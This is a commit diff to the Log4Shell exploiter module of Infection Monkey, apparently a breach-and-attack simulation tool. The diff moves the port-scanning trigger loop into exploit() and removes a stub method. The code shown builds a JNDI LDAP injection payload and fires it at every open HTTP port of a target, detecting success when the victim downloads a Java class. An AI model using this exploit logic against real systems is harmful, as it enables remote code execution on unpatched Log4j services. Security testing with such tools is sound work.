Agent: remove unused upload_monkey() and rename _trigger_exploit

2022-01-06 13:00:37 +02:00 · 2022-01-06 13:00:37 +02:00 · 0cd6b1e616
parent 7bace927f8
commit 0cd6b1e616
1 changed files with 18 additions and 24 deletions
--- a/monkey/infection_monkey/exploit/log4shell.py
+++ b/monkey/infection_monkey/exploit/log4shell.py
@ -84,26 +84,6 @@ class Log4ShellExploiter(WebRCE):
        # If java class was downloaded it means that victim is vulnerable
        return Log4ShellExploiter.HTTPHandler.class_downloaded

-    def _trigger_exploit(self):
-        # Try to exploit all services,
-        # because we don't know which services are running and on which ports
-        open_ports = [
-            int(port[0]) for port in WebRCE.get_open_service_ports(self.host, self.HTTP, ["http"])
-        ]
-        for exploit in get_log4shell_service_exploiters():
-            for port in open_ports:
-                exploit.trigger_exploit(self.build_ldap_payload(), self.host, port)
-
-                # Wait for request
-                sleep(Log4ShellExploiter.REQUEST_TO_VICTIM_TIME)
-
-                if Log4ShellExploiter.HTTPHandler.class_downloaded:
-                    self.exploit_info["vulnerable_service"] = {
-                        "service_name": exploit.service_name,
-                        "port": port,
-                    }
-                return
-
    def build_ldap_payload(self):
        interface_ip = get_interface_to_target(self.host.ip_addr)
        return f"${{jndi:ldap://{interface_ip}:{self.ldap_port}/dn=Exploit}}"
@ -132,11 +112,25 @@ class Log4ShellExploiter(WebRCE):
        else:
            return build_exploit_bytecode(exploit_command, WINDOWS_EXPLOIT_TEMPLATE_PATH)

-    def upload_monkey(self, url, commands=None):
-        pass
-
    def exploit(self, url, command):
-        pass
+        # Try to exploit all services,
+        # because we don't know which services are running and on which ports
+        open_ports = [
+            int(port[0]) for port in WebRCE.get_open_service_ports(self.host, self.HTTP, ["http"])
+        ]
+        for exploit in get_log4shell_service_exploiters():
+            for port in open_ports:
+                exploit.trigger_exploit(self.build_ldap_payload(), self.host, port)
+
+                # Wait for request
+                sleep(Log4ShellExploiter.REQUEST_TO_VICTIM_TIME)
+
+                if Log4ShellExploiter.HTTPHandler.class_downloaded:
+                    self.exploit_info["vulnerable_service"] = {
+                        "service_name": exploit.service_name,
+                        "port": port,
+                    }
+                return

    class HTTPHandler(http.server.BaseHTTPRequestHandler):